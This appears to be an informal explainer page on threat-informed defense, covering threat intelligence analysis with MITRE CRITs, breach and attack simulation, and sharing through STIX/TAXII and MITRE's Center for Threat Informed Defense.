Threat-Informed Defense
The concept of Threat Informed Defense is a proactive approach to cyber security that utilizes three elements to provide an evolving feedback loop to your security team:
Cyber threat intelligence analysis
Defensive engagement of the threat
Focused sharing and collaboration
First Cyber Threat Intelligence Analysis
A threat-informed defense first begins with being threat-informed and being informed requires threat intelligence. from that point you are able to understand who is likely to attack you and how they are likely to do it. This information gives you the basis for your defenses.
so the Threat Intelligence Analysis is taking existing intelligence data like TTPs, malware hashes, or domain names, and applying human intelligence to harden cyber defenses. This improves ways to anticipate, prevent, detect, and respond to cyber-attacks.
let’s take a CRITS as an example of what is going into cyber threat Intelligence analysis
MITRE CRITS
CRITs is a free, open-source tool designed for analysts and security professionals working on threat defense. its main goal is to offer an adaptable and open platform for analyzing and collaborating on threat data.
it does a handful of things that assist with intelligence analysis such as:
Collecting and archiving attack artifacts
Associating artifacts with stages of the cyber attack lifecycle
Conducting malware reverse engineering
Tracking environmental influences
Connecting all of this together to shape and prioritize defenses and react to incidents
we used CRITs here as an example, it gives us a good illustration of what the features of cyber threat intelligence are for more info about CRITs
moving forward to the second element which is
Defensive Engagement of the Threat
Defensive Engagement of the Threat takes what you’ve learned from Intelligence Analysis and allows you to look for indicators of a pending, active, or successful cyber attack.
Breach and Attack Simulation (BAS) tools fit in well here because they take the behavioral models uncovered during intel analysis and use to allow you to automate testing and reporting on what those behavior patterns look like in our enterprise.
These simulation results feed back into your Threat Intelligence Analysis and into the next
element we’re going to talk about: Focused Sharing and Collaboration.
Focused Sharing and Collaboration
By sharing threat actor TTPs through standards such as STIX and TAXII, the security community benefits together.
If you are part of a large organization with different security groups, information shared between groups in a standard format can help your enterprise build a threat informed defense.
Groups like MITRE’s Center for Threat Informed Defense (CTID) bring together sophisticated security teams from leading organizations around the world to expand the global understanding of adversary behaviors. They accomplish this by creating focus, collaboration, and coordination to accelerate innovation in threat-informed defense, building on the MITRE ATT&CK framework.
Last updated